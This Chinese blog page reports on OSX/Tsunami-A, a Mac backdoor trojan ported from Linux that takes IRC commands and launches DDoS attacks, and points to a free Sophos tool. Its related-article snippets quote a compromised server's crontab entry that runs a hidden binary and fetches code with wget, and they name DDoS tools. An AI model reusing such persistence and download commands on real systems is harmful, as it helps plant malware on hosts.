Mac: 新发现的针对Mac系统的木马-Tsunami-A

最新推荐文章于 2025-11-24 15:19:01 发布
最新推荐文章于 2025-11-24 15:19:01 发布 · 225 阅读 · 0
文章标签:

#操作系统

一款新的后门木马程序被发现针对MacOSX系统,此木马源自Linux平台,能通过IRC接收指令发动DDoS攻击或执行其他恶意操作,使用户的Mac设备面临风险。安全公司Sophos为此提供了免费的防护工具。

OSX/Tsunami-A一个针对Mac OS X系统的后门木马程序,Graham Cluley,SOPHOS公司的资深技术顾问,于2011年11月25日发布在该公司的官方网站。据他说,这个木马后门程序是从一个过去基于Linux的木马移植到Mac OS X系统的,这个木马随时听候IRC发过来的指令,它不仅可以发起DDoS攻击,而且还可以执行控制者发出的各种指令。这样不仅你的Mac系统可以作为发起违法的DDoS攻击的工具,同时也把自己的数据处于危险之中。



该公司有一款针对个人用户免费的杀毒软件,可以免费下载使用。


iteye_365
关注
DDoS木马-Tsunami家族样本分析
人饭子的博客
11-06 671
#sidebar { position: absolute; top: 0; left: 0; bottom: 0; width: 250px; padding: 0; margin: 0; overflow: auto } #page-container { position: absolute; top: 0; left: 0; margin: 0; padding: 0; bord...
冰河ddos压力测试系统_Linux macOS系统 压力测试工具stress
weixin_39874809的博客
12-06 1720
Linux和macOS系统都支持在线安装。下面拿macOS做个举例➜ brew search stress==> Formulaestress stress-ng➜ brew install stressUpdating Homebrew...==> Downloadinghttps://homebrew.bi...
又一个Mac特洛伊木马被发现!苹果用户要警惕
轻轻草原
07-26 850
Mac电脑安全公司Intego最近发现了一个针对“雪豹”和“狮子”的Mac OS X系统木马,安全研究人员将其命名为“OS/X Crisis”。这个恶意软件是一种植入式的木马病毒,他通过自身的一系列恶意代码把自己伪装成游戏、屏保甚至是音乐文件。这种木马会在没有通知用户的情况下自动安装,并把自己的行踪掩盖起来。其安全研究员Lysa Myers指出:“这种类型的病毒并不常见,它会极力把自己掩藏...
Mac: 再现木马
中国在线教育
10-28 1731
Mac: 再现木马<br />它被发现并被称作,trojan.osx.boonana.a,他可以传染现在主流的Mac OS X系统,该病毒目前通过各种社交网络,以一个叫做"Is this you in this video?"的连接形式传播。<br /> <br />这个连接是一个Java程序,它包含传染Windows和Mac系统的代码,以前有有关在Windows版本的传染报道,不过现在他已经包含了Mac的代码。在Mac上,它会下载Java程序,Java会提示如下提示,而如果你认可,该Java程序可以通过这
Mac木马病毒再现(OSX/Crisis)
系统运维
07-27 588
正当我们翘首期待新版Mac OS X美洲狮10.8的发布,并为它而欢欣鼓舞,忙于下载/安装/测试的时候,在网络安全界却传来了又一个不幸的消息,一个新的Mac病毒被监测到。 这个由Intego公司首先监测到并分析和发布一些具体细节的病毒,同以往的有这很大的不同,比如上次的那个"闻名于世"的闪回(FlashBack),这个病毒并不需要用户的干预,其实,它是默默地在用户无从察觉中感染电...
japan-tsunami:NoSQL 项目
06-07
【标题】:“japan-tsunami: NoSQL项目” 这个项目名为“japan-tsunami”,专注于使用NoSQL数据库技术处理日本海啸相关的大量数据。NoSQL,即非关系型数据库,是为处理大规模分布式数据而设计的,特别适合应对突发...
tsunami-security-scanner:Tsunami是具有可扩展插件系统的通用网络安全扫描程序,可用于以高置信度检测高严重性漏洞
02-26
Tsunami是具有可扩展插件系统的通用网络安全扫描程序,用于以高置信度检测高严重性漏洞。 要了解有关海啸的更多信息,请访问我们的。 海啸严重依赖其插件系统来提供基本的扫描功能。 所有公开可用的Tsunami插件都...
temp-Tsunami81192-Vehicle-33044-1753034088900.zip
08-03
虽然压缩包的具体内容无法直接得知,因为文件名称列表信息未提供,但从标题中的“temp-Tsunami81192-Vehicle-33044-1753034088900.zip”可以推测这可能是与网络技术相关的文件,由于提及了"Tsunami",这可能指的是一...
活跃挖矿木马盘点
m0_59598029的博客
07-30 859
挖矿木马通过各种手段将挖矿程序植入受害者的计算机中,在用户不知情的情况下,利用受害者计算机的运算能力进行挖矿,从而获取非法收益。目前已知多个威胁组织(例如,“8220”、H2Miner等)传播挖矿木马,致使用户系统资源被恶意占用和消耗、硬件寿命被缩短,严重影响用户生产生活,妨害国民经济和社会发展。2022年,安天CERT发布了多篇针对挖矿木马的分析报告,现将2022年典型的挖矿木马梳理形成家族概览,进行分享。挖矿木马家族出现时间针对平台—|—|—82202017年Outlaw2018年Linux。
linux世界中的10大经典病毒全分析,从零基础入门到精通,收藏这一篇就够了!
ewii12567的博客
08-18 503
今天收集整理了linux世界中的10大病毒的特点及影响。Linux系统由于其高度的安全性和开源特性,比起Windows和其他操作系统,病毒和恶意软件的感染案例要少得多。然而,这并不意味着Linux系统就是完全安全的,它们也可能受到攻击。
威胁快报|首爆,新披露Jenkins RCE漏洞成ImposterMiner挖矿木马新“跳板” ...
weixin_34353714的博客
03-26 312
简介 阿里云安全于近日捕获到一起使用Jenkins RCE漏洞进行攻击的挖矿事件。除挖矿外,攻击者还曾植入具有C&C功能的tsunami木马,也预留了反弹shell的功能,给用户带来极大安全隐患。 由于攻击者直接复制了Jenkins系列漏洞发现者(Orange.tw)在博客上公布的poc,攻击payload含有"Orange.tw"字样,可能被误...
两款实用的DDos攻击工具
热门推荐
Man_In_The_Night的博客
04-04 7万+
两款实用的DDos攻击工具 2018-02-22Network•Security865 之前为了重现某个bug,需要对网络设备进行ddos攻击测试,同时也是对设备的网络攻击防护功能进行抗压测试。临阵磨枪,google了两款攻击工具,windows平台的hyenae,以及Linux平台的hping3,在此记录一下两者的用法。 Hyenae hyenae是在Windows平台上非常好用的一...
TSUNAMI 5054-R
weixin_33831196的博客
07-14 141
PROXIM Tsunami 5054-R 5.8G 点对多点产品 Tsunami MP.11 Model 5054-R:   无线点到多点系统   与前一代产品一样,5054-R继续为可适应未来需要的无线网络提供全面的功能集。   o 在坚固的外壳中采用了珀耳帖电加热和冷却技术,5054-R可部署在极端的环境中   o 支持三个5 GHz频段 - 5.2...
Linux 下一木马程序分享
系统运维
03-05 339
前几天公司服务器被添加了一木马恶意程序,该程序一运行便对外发起了大量的连接,导致整个内网瘫痪掉,该木马注入的方式非常简单,只是在Linux crond定时器里加入以下任务: [root@localhost tmp]# crontab -l * * * * * /root/.zxc &gt;/dev/null 2&gt;&amp;1 @weekly wget -q http://stab...
Linux---进程概念(一)——冯诺依曼体系、操作系统、进程、PCB的概念讲解
2401_88465894的博客
11-22 838
本文系统阐述了计算机系统的核心概念。首先介绍了冯诺依曼体系结构,包括五大组件(输入设备、存储器、运算器、控制器、输出设备)及其协作关系,重点解释了内存作为CPU与磁盘间缓冲的重要性。其次深入剖析了操作系统的本质,即通过"先描述再组织"的方式管理软硬件资源,将管理对象抽象为数据结构进行操作。然后详细讲解了进程概念,指出进程由内存中的程序代码/数据和PCB(进程控制块)共同构成,并阐述了进程调度中上下文切换的机制。最后说明了进程标识符的获取方式,强调用户程序必须通过系统调用访问内核数据结构。
Java原生网络编程-BIO与NIO
照母山挖洋芋
11-24 775
摘要:本文对比了Java原生JDK中的BIO(阻塞I/O)和NIO(非阻塞I/O)网络编程模型。BIO采用"一连接一线程"模式,存在线程资源浪费和性能瓶颈问题,可通过线程池优化为伪异步I/O模型。NIO通过Selector、Channel和Buffer三大核心组件实现非阻塞通信,支持单线程管理多个通道。重点介绍了NIO的Reactor模式、事件类型(OP_READ/OP_WRITE等)及服务端/客户端的不同关注点,展示了NIO相比BIO在高并发场景下的优势。(149字)
98-爬取租房网站信息-1
最新发布
11-24 219
import aiohttp #异步的网络请求模块。import asyncio #异步请求。操作系统:windows11。语言:Python3.10。开发环境:PyCharm。#导入伪造头部的信息。
MacTsunami UDP传输工具的安装问题修复
1. **安装问题描述**:文章可能详细描述了在特定Mac系统上安装Tsunami UDP时遇到的具体错误信息和表现。 2. **解决方案步骤**:详细列出了如何通过修改软件或系统设置来解决安装问题的方法步骤。 3. **额外建议**:...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值